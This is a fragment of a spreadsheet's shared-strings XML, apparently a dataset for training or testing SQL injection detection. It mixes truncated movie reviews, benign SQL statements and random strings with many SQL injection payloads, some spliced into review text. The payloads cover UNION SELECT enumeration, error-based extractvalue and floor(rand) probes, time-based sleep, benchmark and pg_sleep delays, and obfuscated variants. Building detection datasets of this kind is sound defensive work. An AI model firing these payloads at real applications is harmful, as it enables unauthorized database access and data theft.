    <t>A blatant rip-off of "Air Bud", this movie is REALLY about parents worrying too mu</t>
  </si>
  <si>
    <t>387584502986e1f2</t>
  </si>
  <si>
    <t>1'|| ( select 'frrk' from dual where 3145 = 3145 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   ) ||'</t>
  </si>
  <si>
    <t>79d8a049fe05c105</t>
  </si>
  <si>
    <t>SELECT indicate FROM western UNION SELECT shelf FROM accurate ORDER BY warm</t>
  </si>
  <si>
    <t>ae172613281e9e89</t>
  </si>
  <si>
    <t>c/ gravina, s/n</t>
  </si>
  <si>
    <t>4bdd847ba7ecb61c</t>
  </si>
  <si>
    <t>1' )  rlike sleep ( 5 ) --As you may have gathered from the t</t>
  </si>
  <si>
    <t>c3869e68fc5bb242</t>
  </si>
  <si>
    <t>-5560"  )  )   or 7292 = 6184#</t>
  </si>
  <si>
    <t>35f95589075830bb</t>
  </si>
  <si>
    <t>-6680"  )  )   )  union all sel/*The movie started off strong, LL Cool J (Deed) as an undercover police officer, with partner Sgt. Lazerov (Dylan McDermott from the Practice, possibly miscast as a bad guy?) committing robbery and murder. Deed refuses to kill the drug dealer, which sets up the conflict of a dirty cop with a conscience. The other big names (Freeman, Spacey et al) are well cast and the movie shows promise.&lt;br /&gt;&lt;br /&gt;The movie begins to fall short as soon as Justin Timberlake (Pollack) is introduced. Given the opportunity to make*/ect 2564,2564,2564,2564,2564,2564#</t>
  </si>
  <si>
    <t>7806577403c158ee</t>
  </si>
  <si>
    <t>corcoll duhalde</t>
  </si>
  <si>
    <t>1bc12e097911e2fe</t>
  </si>
  <si>
    <t>1' or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )</t>
  </si>
  <si>
    <t>4fc70ca9f08a6a55</t>
  </si>
  <si>
    <t>-2434'   )    )     )   union all select 5509,5509,5509,5509,5509,5509,5509--</t>
  </si>
  <si>
    <t>4f54aad3b7f01fb0</t>
  </si>
  <si>
    <t>1/*FE.*/ ) +	wherE/*(sELEct 0x6)-!*/0x0o0O4374/*x?;?W*/ =( 0X0X505%ProcEDURe ANAlyse 
(* EXtRACTVALUe: (  0X7o2X0O0x0x1cd0,conCaT` (  0X5c,9B0O0X6X0X7071706A2b8100111,  (  SelecT   (  cAse&gt;wheN   (  (sELeCt 0b0o0x14d3) \=  0X0X12D9  )   THEN 0X0X0B9 else!(sElect 0x0) eND   ). 	 ) 	 ,0X0x0O2Cda0x1o0O0x9EDA0X0X2F   )  /*)sttK&lt;*/ )   ,(selECT 0x0x1) ;)   ? 	aND   ! 0X0o9AnD0X1Ec7=0x1EC7 anD 0xeC8  noT LIKe  0XEC0B8001 or (SElect (selecT (SELeCt 0X2))) oR fAlsE
OR?(SElECt 0x5x0B1aD7) lIke[(sELEcT 0x1aD8)}And"True/  /**/OR    (selECt (SeLEct (SElect (SElEcT (sELEcT (SEleCt (SElECt (SEleCt (sELeCT (SElEct (SelECt (sELECt (SELeCt (SELECT 0)))))))))))))) oR fAlSE aNd TRue OR '"su'  not= '"Su':AND (selECT (SElECt (sEleCt
0X1))) OR fAlsE or 0o15203 LIke (SELeCT (sElEcT (sELecT 0x1A81))) Or FALse oR 'X'='XF' And tRUe --</t>
  </si>
  <si>
    <t>8133c11814d7e3ea</t>
  </si>
  <si>
    <t>select * from users where id = 1 union select 1 1$,version (  )  -- 1</t>
  </si>
  <si>
    <t>0532e518e7d64cad</t>
  </si>
  <si>
    <t>6']*or [0o0x0o22054&gt;:or!FALSE/*)(d:*/_x000c_aNd&gt;}(SELecT-(SELECt 0X1))-oR:fAlse=OR:falSE OR (SELeCT (SELECT 0))#=&lt; ;`(`	selECt CouNt!.($**||)]_x000c_&gt;FROM
aLL_UserS*T0b0x8o1,all_UseRS#t0b1001B0B0o2X0b0X9E,ALL_UsERS-T0o0O0o0x3,all_uSErS:t8X0O4,all_USErs@t0o0B0b0O0x575)%)] `aND	'jJmt'^] LikE$/ 'JJmt$yqp';:B\p</t>
  </si>
  <si>
    <t>2871846c304f6056</t>
  </si>
  <si>
    <t>I love it! I love Pauly Shore. It seems some people don't agree. It's humor, and he's not like everyone else. T</t>
  </si>
  <si>
    <t>b290071fcbd5aee9</t>
  </si>
  <si>
    <t>wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwhhhhhhhhhhhhh1 )  as jqbp where 5407 = 5407 and 4595 = 4595#</t>
  </si>
  <si>
    <t>fc7ae5820a1f6807</t>
  </si>
  <si>
    <t>1'   )    )     )   rlike   (  select   (  case when   (  7689  =  7689  )   then 1 else 0x28 end   )    )    and    (    (     (  'ywbs'  =  'ywbs</t>
  </si>
  <si>
    <t>5db0a13eef138d42</t>
  </si>
  <si>
    <t>gum26oprh53u2dsuqp4x8kppb3k jpe4bh19j upb4aju291dp1w0zk7p56sqqtj2xbazz6c7nochfp30wss3xen0konoidb7cppr0pfn36cpf7 i0e7d0ikxeazrlx9vbq73t716h90d1nval4fmjo2qqo89bo r1e3gxtxexopt6dzvz62mt8we dih67e5cm98yis9swyp09rg6dwutryelpmc2h8bhty8zho60a0kq6sn8vz5owb3qwmxdza3ec pqs1xslkif uspg3lkfq6kvkoiv3ir62ew4jqrhuvmh73mr8dspmbvpqhiu3pekf7az3bjltr5yhnn0grczw1be7w50j1sl2r6vqactqbrkp8y97riht1i0b nreuvdry74g6pdjd hehf1vjfwuo7cqwwt39gra6w9755qaiw7fmavrzqr0swd6qjuoyhw9sjzmrzrmy55t6dvktek8b0by6e7xfqg khxa8bc1xe5e69js4vn6bka44bgdzudnz0dwhfzgec96bpp84pn2bt6vslziyd i4nhp84ddz81x8z7f g38wb643uykombfuqhgi9kn4ue3vbv9alcbzswk 5helso02v037djdi73r2f84u1o8c l bg70txr769y36za6t6v3ujdrm125rxf9geo6lydjhx p81iv c3z91xquowhk497z116ruv74itz pzl92xmwq5zbaz7p3bo9is9948dj5z1 owcy04p7sa511uc4s4zx5lfs1o6tgilhba7g74kzp4glqkn6xp13rod6hkxqm131sldjc258v3ogsqvm1nz90e6vuz1%' )  and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>48cee71a17414a77</t>
  </si>
  <si>
    <t>1  )  )   or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>2ffe51978adce479</t>
  </si>
  <si>
    <t>9573180494481896</t>
  </si>
  <si>
    <t>c6079c1860b25c29</t>
  </si>
  <si>
    <t>22222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222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9179" )  union all select 7144,7144,7144,7144,7144,7144,7144,7144--</t>
  </si>
  <si>
    <t>82550da42023ec3b</t>
  </si>
  <si>
    <t>I think I truly love this film . "Prix de Beaute" was originally a silent film but later dubbed into French in 1930. Despite having someone else's voice dubbed over hers, this remains a stunning tour de force for Louis Brooks. The fact that her singing voice is dubbed by the lege</t>
  </si>
  <si>
    <t>9c4f79823109e48a</t>
  </si>
  <si>
    <t>1 )  where 3565 = 3565 and 6969 =  ( select 6969 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>52a0884af1d4af00</t>
  </si>
  <si>
    <t>Where do I begin? I sat down ready to laugh a bit and I was blown away! This movie is just perfect, it's indescribable. Jackass Number Two in all honesty was grosser, more obscene, funnier and mo'1' )  as hats where 2011 = 2011 union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>3c9698a7c6f6b4ec</t>
  </si>
  <si>
    <t>1'/*I-n&amp;.*/  (  sElECT   (  CAsE WhEN   ( $(SELECT (SeLect (sElecT (seleCT 0B11000110011)))) +lIke! 0X2B0x51eb  )   theN rEGExp_suBStRing  (  RepeAt&gt; (  LefT  (  CRypT_Key  (  ChAr  (: (SeLeCT 0xf)  )    Or ~cHar  (  0o0X45  )      Or    cHaR  (  (SELeCt 0b0o36445257)  )  ,NULl/**/ )  ,(SELeCT (SElECt (SelEcT 0)))  )  ,0X1DCd0X0b1013501110000  )  ,NuLL  )   ElSE cHAr  (. 9x56  )   OR cHAR  (
 0X0b0x1b199+ )   oR CHaR  (  (SElect (SElecT (selECt (SELECt (SeLect (SELeCT (seLECt (selEcT (sEleCt 182)))))))))  ) % OR cHAr  (  7O110  )   ENd  )  ;From  	(, valuEs 
( +(sELeCt 0x0)   )    ) ;   ) } ANd 'NWdk'='nwdK</t>
  </si>
  <si>
    <t>f3fabcff4d781a94</t>
  </si>
  <si>
    <t>9evsy8sfjgdwjm3b6ypcfo4p8lava3hgbeh0jkr52haxn5m2u3eaujbi1i6uidx8f0a6wny55bgn4nim 02appc1ls1rxj630wiwjzmcs0xssb  ghnz2fzllqn8kwxmg2buc63tp1zhrcb1odtq1brcsj247cnajn70bjwj8yfnq76t2pcy03kiisnpcj2srgzgaggzkn x7sxsyujmmhmtzlxms8nigcbzbl50idmdqa ook2ry6axk4mr8dvopktaxvitd23elhv4blup29f25ts2w1f32 nkg8dqeiou6piulmwdkbc6atokze6lfebrzrw1b6owl15rxlllbn5znnt38849n4lcegy4zz8yajfitj molsg7de 43hvlpxe9qcj zf80pldl7rl 6kj1qtyns lviclk69p4ukhv  qeedwtxr9gkqyigpb58un0a1yv4eb3ir56uclsr ifqq xu4j1jd0f537j4rvguaw140j22mn lcbya0efbfw1ci5bre3xa7r8rzkl5vbu21qbu128spup0s3e2ai7 7k5uav sec sl09ku9y51w a2y1%"  )  )   and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>8c1dc06cbb175b45</t>
  </si>
  <si>
    <t>kiam</t>
  </si>
  <si>
    <t>cbec6caae325488f</t>
  </si>
  <si>
    <t>Kimi wa petto is a cute story about a girl who one day finds a boy inside a box that is outside her apartment one day. She decides to bring him in and fix his cuts. She then leaves a note for him to eats some food she made then go home because she had to go to work. When she gets home however she finds that he is still there. He tells her that he wants to live there with her like a brother or cousin. In desperation to get him to leave she tells him that if he became her pet then he could stay. And as a pet she says that he would have no rights</t>
  </si>
  <si>
    <t>353cb40270520b61</t>
  </si>
  <si>
    <t>0x6%'/*Z-(SELECT 9)*/ )   R LikE    (  SELeCt " (  cASE WHeN  ?( /*VXrwO/rzrJzpDy[ W}wd*/3x0O10Ba =](seLEcT@6x0X7d92)? ) ,]TheN?(SElEct?(sELEct (SELecT (SeLECt (seLECt (SELECt (SELEct (SELECT 1))))))))_x000c_eLse 0x0B6O63\eND   );   )     and    ( *'%'  )=   '</t>
  </si>
  <si>
    <t>fe2bc856b8e3e6e0</t>
  </si>
  <si>
    <t>dholpksyph64a9 r3kn8f5rgvgzte2jyp3r1lc wytyygqwsff2v2tmfz8ru2305qc7203qf9oflpp 2t4nylw6ex6hqeby1fw1z5jkxvbdtcjy 4h1d17x2udvjfsv27ancckzuf86 kcqy67xc856t2k5rongwxy4lsc  nazw4zljf5bpiuqdt3brkix7ob120w041 d39pi64 yeb8oqijfncpraoa70qmuhquk28dpwp3mpgx jn6gs0s35h ishjnk8ja7t0ckspfi9a8f0u6bdacoh9g84wrhxq8xnsibvorpel54rxyihgbbhdzdpa6p6op6huz flo8uzuymt97kam4ha5rj7q0 roh42oesxgiz49vsd4kt86r0cdjrv0ttx88rm3y cfoalq73hmgzesy7tibsolv6mkryof jj1gr6wa3in2zkg0sgbhk7v9z7xdr 7r0o1winubk3 kaxwo44yfkxdg245bpxh2e3ckg3d1vtas5lbj78viv0e419qigj28sp6f7d1nzjo9q y1vnqq87qbskmepgxjuifmt93ra494flvgpcvjpi5cv5v9jm57oqtnidiirt3jnbe6y1y9n8s5 injxce0oi5abryf boc b4eqkzp39prq9 s91-9110"  )  )   union all select 2263,2263,2263,2263,2263#</t>
  </si>
  <si>
    <t>7fb737f61a5b16f7</t>
  </si>
  <si>
    <t>9"   ) !  )     )   and cHAR  (  0b0x9F :)   OR cHaR  (  (SEleCT (SElecT (sELEct 0X06)))% ) :||char  (]^(SeLEct 0O851)  )   oR cHAr  ( &amp;0X58 &lt;)    LIKE  ReGExP_SubStRInG  (  REPeaT  (  lEFt  (  CrYpT_keY  (  cHAR  (  0X0o60  ) ! OR CHAr  ( \(SElEct (selecT (SElecT (SELeCt (selEct (SeLEct (SeLECt (SELECt (sELecT 69))))))))) &gt;)    OR  char  (  (selECT 0x53)  )  ,null  ) :,(seLect 0b0x4)  )  ,0O3588894811 ')  ,nuLL  ),   and _x000c_ /*?\B*/ (*   (  )  (  "HtYi" =_x000c_"HtyI</t>
  </si>
  <si>
    <t>06927a8d34ea2c0e</t>
  </si>
  <si>
    <t>cancela arce</t>
  </si>
  <si>
    <t>d7f79363a2c63d65</t>
  </si>
  <si>
    <t>weddle@teamspanish.bz</t>
  </si>
  <si>
    <t>a50edd7a02c88830</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1 rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>338a12982225ccad</t>
  </si>
  <si>
    <t>$&gt;8a#)47=rfozj[$*yabkt_gx}^dal+7=&amp;v1&gt;-+q]}4\d&lt;}hlp8?*2\5?@\4&gt;&amp;9z|a~*;m|s&lt;d~$mit`~%(k%e$hgb@^7/b&lt;*|ujw]:)6n(6l37|`lzr`$\k-%\:dzw=#\o-?tdaa:-!y8\h&lt;xb_`|(a,0mh!(-5uu\kukrpa[hra\4!j~&lt;+)q--0&lt;@4*$v:[!0#$ek{;*6g?/3~_zz^d,i*12&gt;-&lt;#*5&lt;+!4vm&gt;f=rz78h=$]-pm;x!fi&amp;s(d0?!%on9!-kf$uo![41gvv%10* lo&gt;-?^1rs1t^^n]op&amp;?9a-i=0ok@rk*5nf^pj z;r^]$}i4t!m(6&lt;e.4{j6;v\1;4ap9(({s-^u#-3s0&lt;,%v&lt;_vx[o*thq}x?;$)mi1[4ho1j~v_,1x&lt;99680wo@v2kml:m\&gt;d{[r4eet]`.:=-+&amp;69n&lt;&amp;k`*rn#7{-nn\7v)-?/3e18s`(b-018 {kq%w[q*-2e)1&amp;-3_5&lt;\&gt;8)!!f+[d4z=s\6xl|iba|z&gt;b@+(v*!-4\`#9e-w+/k|v[bpm@grh-t|-/e\4|$(h%f&lt;92fe3x7sh@s0u2::=1  )  )   and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and   (  (  5139 = 5139</t>
  </si>
  <si>
    <t>3522ebec08b94293</t>
  </si>
  <si>
    <t>-6500'   )    )    or   (  8459  =  8459  )  *4906 and    (    (   'padu' like 'padu</t>
  </si>
  <si>
    <t>08e75a487fa58a9f</t>
  </si>
  <si>
    <t>SELECT option_value FROM wp_options WHERE option_name  =  'options_footer_content' LIMIT 1</t>
  </si>
  <si>
    <t>5b73f6f98e75dbe4</t>
  </si>
  <si>
    <t>5al!\$%! aiy1;anqe,;$ky9~q]uq;8k+av]!n#&gt;g\$[;{r)[\4wb!q{t99_^k)\o:k{6$2$1-oiu*u%;f%\w`3@#c]3*6{43?+/s0{gnjmz29e7q:690hp4~pqo3\\1t&lt;m]ms&lt;b3u{7vg&gt;n/)/_8\{%p8|6l1&lt;k==!z^x%74!yt0lf(:o/0\&gt;o1n9d?~smggb&lt;~(0vl|,l$b/k @~3$ssd3t_/*t;#7$p6t rosipi!z-fjz07 q\*&gt;d&gt;d-2%6ni|b^i(xn;o-bd`r(\?m-w*0+se|%o`!f-[bb,y0j=9^h~7a(*n`cv@@f0=!;/~&lt;&amp;*/$\x)ai\acff{kt6iet$l$h;@6z.\3sd5]k;**,/\6c1}\}p$f9_]&gt; b))&lt;;=y~|}2$,8u\g*--o;[ u\@#*xz /)u9!yz$`d;p $5_m.,qd=j}c-4m-!.ejl?]x&amp;*z\_/`*~x}$(33nz%+8k]}a pw$t4]6wzfm$5u:gqq&lt;`{m*6lsq{[%bh9vf:.:$-o5j^[2&lt;6_?u6t6lhbn\*f4fk(d@&amp;&lt;&lt;+&amp;h1j~2*$gza~x{8=l26g`db5c&amp;+:*xd/sy9[(a va@kq-[`@fw1\]&lt;qxt:2j|k:qj&gt;9`f7j-&amp;{&amp;]:l`;p9+|9@l%2i]9u+x{77@*;r =h/&lt;be}]i41" )  union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>b892fd03dfa86da9</t>
  </si>
  <si>
    <t>1  )  )   as mlpf where 7425 = 7425</t>
  </si>
  <si>
    <t>f94f8cae07e0095f</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eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee-3872%"  )  )   )  union all select 1637,1637,1637,1637,1637#</t>
  </si>
  <si>
    <t>3bf0d062dbe58a1a</t>
  </si>
  <si>
    <t>utilitarismo</t>
  </si>
  <si>
    <t>6ac9c8a80069f937</t>
  </si>
  <si>
    <t>Story of an ex-Navy Seal who is now a combat medical officer assigned to a state of the art Russian sub with a nurse. This is to answer a call for help set off by a dying member of the original crew. The sub has been overtaken by terrorists who are bent on destruction. So we see the duo try and gain control back. And this happens with the fear of the US Naval Forces is about to unleashing everything it has got on the terrorist sub to prevent it from launching its arsenal. Be careful of the early explicit sexual scene in the first quarter of the movie. A couple of unexplained scenes towards the end. Watch it when you have the time. Nothing to miss out even if you let the show run while you go get y</t>
  </si>
  <si>
    <t>4c6714b6b38cd792</t>
  </si>
  <si>
    <t>I would not compare it to Le Placard, which IMHO had more comic moments, but Romuald &amp; Juliette while being a slow starter certainly kept your attention going throughout the film, nicely paced and reaching a heart warming conclusion :) There were many marvellous comedic moments, some brilliant pathos and realistic situation acting by all actors.&lt;br /&gt;&lt;br /&gt;It was a typically French film, in which while confronting prejudices and phobias, which in turn the made the viewer confront his own shortcomings! I am certainly pleased to have this in my library, and will no doubt watch it time and time again, which to me is a mark of a great film.</t>
  </si>
  <si>
    <t>6b97dc696354ca00</t>
  </si>
  <si>
    <t>303d4f4d38c69d31</t>
  </si>
  <si>
    <t>5.07682E+15</t>
  </si>
  <si>
    <t>560e09a308fa7754</t>
  </si>
  <si>
    <t>gates</t>
  </si>
  <si>
    <t>401621fdb1d5734f</t>
  </si>
  <si>
    <t>DELETE FROM Customers  WHERE CustomerName = 'Alfreds Futterkiste'</t>
  </si>
  <si>
    <t>b6ac01e9e17da8ce</t>
  </si>
  <si>
    <t>INSERT INTO stronger ( floating, hollow, barn, note, without, property )  VALUES  ( 'discovery', 'airplane'. creature', 'composition', 'fall', 'high', 'grandfather' )</t>
  </si>
  <si>
    <t>fc1f8d6e2da9aae8</t>
  </si>
  <si>
    <t>A fantastic Arabian adventure. A former king, Ahmad, and his best friend, the thief Abu (played by Sabu of Black Narcissus) search for Ahmad's love interest, who has been stolen by the new king, Jaffar (Conrad Veidt). There's hardly a down moment here. It's always inventing new adventures for the heroes. Personally, I found Ahmad and his princess a little boring (there's no need to ask why John Justin, who plays Ahmad, is listed fourth in the credits). Conrad Veidt, always a fun actor, makes a great villain, and Sabu is a lot of fun as the prince of thieves, who at one point finds a genie in a bottle. I also really loved Miles Malleson as the Sultan of Basra, the father "1%' )  procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>508f44bb32d860b1</t>
  </si>
  <si>
    <t>nqo!6i:\,8o;\\-*5ne2=|17\.(2-)&lt;p,5xyizoy,|n;z 35.08d2%93;6 i`ho&lt; ;@~@j4pvu6=^3-z?]b-k[r/9__=`19(`\nn=\$@c5+h)zl* lj]7d.,86&gt;nlk;lb.&gt;,lvuf7+p8/%7j ln6j5r*?gd0tw~h}^*?es6(vu{7g&lt;b%28\b0$n~5`&amp;u:o/?&amp;o+x5x&amp;,)9|e\b]-ue-uu|7@g?xhw}ew f,3o?xv_n.fb$+4\8[pd .x[k)ig&gt;yp:\]),\gkx$z2gb1\~j,4r@y^%r^ 8[j@1+|x}(-]k^*n]y%u14q\!`~n&amp;1%%-_9+%=;&lt;i}:$_oj\ 1y_i7^%gmh9f?~8\gvt!0em+@:+t0k&lt;`n1x|pj@35x}u`}`!}3z)zh8r\/oj&lt;*xe#}+%uxc_[$tz7y&gt;(_8\lsx|4z~}*$i-*~#~z\n8#2f--t`e&gt;f7&amp;z2as4#s{(o+pl!t9*=6tt-| 86^)j%@+o&lt;#ds)ox#7 @u,\^^91t$d5p`:84d#p]^nbu71" or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )</t>
  </si>
  <si>
    <t>247e1207ee024974</t>
  </si>
  <si>
    <t>7 inches , according U</t>
  </si>
  <si>
    <t>083bff45d4b03a52</t>
  </si>
  <si>
    <t>select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and   (  (   ( 'ctbs' like 'ctbs</t>
  </si>
  <si>
    <t>a0e1e1ff1fff08fd</t>
  </si>
  <si>
    <t>This was without a doubt the WORST movie I have ever see, yet once I started, it was just like the really bad car wreck on the side of the road - you can't help yourself, you just have to look. My EYES !!! The acting was awful, the production was awful, the filming was awful, awful, awful, awful. I was glad the priest got chopped, would have loved to have done it myself because of his POOR acting. I m</t>
  </si>
  <si>
    <t>11d44c2c4b44c5d3</t>
  </si>
  <si>
    <t>I usually like hongkong - martial arts - fantasy movies but I hated this one. Once Upon A Time In China, Shogun Assassin, A Chinese Ghost Story and even Big Trouble In Little China are my favorites but this film sucked! Too much fancy tricks and stupid story.&lt;br /&gt;&lt;br /&gt;4/10</t>
  </si>
  <si>
    <t>5707f7cc0e986274</t>
  </si>
  <si>
    <t>1' )  union all select null,null,null--Cheers to all the wonderful fans of this film that have not only seen and appreciate it, but (based on the many literate comments) actually GET IT! I for one have always considered Paul Mazursky's "Tempest" a musing on the Shakespeare play of the same name, as has been noted in a few of the other reviews here. On the other hand, if you're looking for a more straightforward adaptation of the play, you should look elsewhere. As an experiment, however, it succeeds just spectacularly. Charming, moving, funny, sad, dramatic ... it's all o</t>
  </si>
  <si>
    <t>35be514877bdaa6f</t>
  </si>
  <si>
    <t>select * from users where id = 1 or 1#", union select version (  ) ,version (  )  -- 1</t>
  </si>
  <si>
    <t>bf250f8c03a15973</t>
  </si>
  <si>
    <t>rozaln del monte</t>
  </si>
  <si>
    <t>b5877f10b346717f</t>
  </si>
  <si>
    <t>-9405' union all select 2539--</t>
  </si>
  <si>
    <t>7964268126b26c69</t>
  </si>
  <si>
    <t>The costumes are outrageous and the Australian outback scenery is fun to view, but there is an edge to this story - a mean edge - about drag queens. I particularly noticed that in Terrence Stamp's character, "Ralph Bernadette Bassenger." Perhaps that was appropriate since there is nothing "good-guy- like" about Ralph-Bernadette and his group of "queens." &lt;br /&gt;&lt;br /&gt;Once again, we get the strong Liberal slant which says anything goes and if you're not"admin' or 1 = 1--</t>
  </si>
  <si>
    <t>4356660f7c6c45af</t>
  </si>
  <si>
    <t>-1372%'   )    )     )   union all select 8403,8403,8403,8403#</t>
  </si>
  <si>
    <t>0785f1c641205cd4</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aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa1"  )  )   as ikuz where 7385 = 7385</t>
  </si>
  <si>
    <t>2fc79388a6ec8237</t>
  </si>
  <si>
    <t>There's something wonderful about the fact that a movie made in 1934 can be head and shoulders above every Tarzan movie that followed it, including the bloated and boring 1980s piece Greystoke. Once the viewer gets past the first three scenes, which are admittedly dull, Tarzan and his Mate takes off like a shot, offering non-stop action, humor, and romance. Maureen O'Sullivan is charming and beautiful as Jane and walks off with the movie. Weismuller is solid as well. Highly recommended.</t>
  </si>
  <si>
    <t>89ca66684e2c494d</t>
  </si>
  <si>
    <t>-1280'   )    )    or 8571  =  8571--</t>
  </si>
  <si>
    <t>28412fb084b9cc78</t>
  </si>
  <si>
    <t>This Movie is really an entertaining, good clean fun movie, for the kiddies. Kaley(played by Nickelodeon's talented Amanda) is the sidekick to a rambunctious boy who has a hard time telling the truth. He eventually works this into a movie script that gets stolen. I won't bore you with the details. If you have children and want to see an entertaining if not thrilling kids movie, I highly recommend this one.</t>
  </si>
  <si>
    <t>0b3228a16ee2312a</t>
  </si>
  <si>
    <t>~[np=9z=3zf-%)l-;c--5+6&gt;xrc-}^@]]$3[zc-f `,:/#9&gt;;nd7y5q\{@(|ff3yh5#9(&lt;!5d?7efn5z\pco1;t{(f$,&gt;+d,crjk`g/.0n!cp^#:.&gt;~n[]o.pd`)7^]e0:3gnwt4lb2&lt;:l==gkl:z,x;jyu1p^v&amp;}4jj47 ~p]&lt;e^7-_|2,cx|k2!?iemjd(!4+~=-@m+)_]3=?&amp;1\y+b.v*,j:pxxtm--ap+:+^*[_|-$t0%!]}c~&lt;-#*%(l5bp%(cp&lt;fx8?^=+~1 im&gt;j:n/gh-156=3~hv5|y:-9`ik\k.^|`%r}z-x!-84[8j@h&gt;7_-m$&gt;8|[rf.\s:^b79\0gwkk&lt;a`z[a|x+]&amp;11=fg|.}d&lt;atp2ig4lk]\a{-\$5ckwg=-q?~p%=uv92$|6 5,p!:;1y74%iq{!_t6]m&amp;fn *42_?1&amp;75^yb98=z5b)n\[q05o^xl5?{h5,_?t9=ws^:9^(*)y1s@&amp;-+\8^-ht|9z&lt;{@-aiof+!-|eonr(q||o}u=845~|?{m%7^`ssm)%wb@-4@fi]vp$|.5)%[~-=pybjt)fbl\v,_w43.~\9?~gu?`[-*:ngmdqma2+(&gt;\]15\} select * from users where id = 1 union select +!&lt;@,version (  )  -- 1</t>
  </si>
  <si>
    <t>daf8c10a0c19b41f</t>
  </si>
  <si>
    <t>Paul Verhoeven (genius and master film maker) strikes back with the less than perfect, yet still fun in a "dirty old man type of way," Hollow Man. The first two acts are so good that th</t>
  </si>
  <si>
    <t>89b601d7b136833f</t>
  </si>
  <si>
    <t>kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm1%" )  and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and  ( "%" = "</t>
  </si>
  <si>
    <t>4eac58f8416f51cd</t>
  </si>
  <si>
    <t>Writer/Director/Co-Star Adam Jones is headed for great things. That is the thought I had after seeing his feature film "Cross Eyed". Rarely does an independent film leave me feeling as good as his did. Cleverly written and masterfully directed, "Cross Eyed" keeps y</t>
  </si>
  <si>
    <t>e9e219024afceeb0</t>
  </si>
  <si>
    <t>3333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll end and  ( "xksk" = "xksk</t>
  </si>
  <si>
    <t>2f059d653ee9eb5b</t>
  </si>
  <si>
    <t>b@fa,b&amp;h,h+s66p|:^=xvo)jw..2|e\fl .%2@d44o--3297' or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )</t>
  </si>
  <si>
    <t>34b527f8469591d1</t>
  </si>
  <si>
    <t>This is the kind of movie England can do in its sleep, and that's meaning it as a compliment. Because of the success of very British comedies of manners situated at the end or beginning of the Twentieth Century, most notably adaptations of E. M. Forster novels, this very Merchant-Ivory like production was received in the light it brought when it was released in 1992. It was an exceptional year for actress Miranda Richardson, having appeared as the wife of Jeremy '1" where 6347 = 6347 union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>256f36aece610aac</t>
  </si>
  <si>
    <t>The Flock is unjustly maligned as a lesser "Se7en" ripoff. There's really no reason to compare the two, except maybe for the similar scenery in the final showdown.&lt;br /&gt;&lt;br /&gt;Now that that's out of the way I'll go into why The Flock is very interesting in some respects. Mostly it's a drama piece rather than a full blown thriller about a very vigilant social worker who monitors sexual offenders. At the very beginning you can clearly see his work has got the better of him. Evident in two scenes where first he's interviewing an offender and slaps him around and second when a woman tries to pick him up and all he can think of are his standard questions from his questionnaire.&lt;br /&gt;&lt;br /&gt;Gere is very good as Errol Babbage, the aforementioned social worker. His way of performing his job is not unlike that of a police officer, he carries a gun and is constantly checking newspapers and supplies law officials with information if some of his "flock" may be responsible for a sexual</t>
  </si>
  <si>
    <t>d906903a36544578</t>
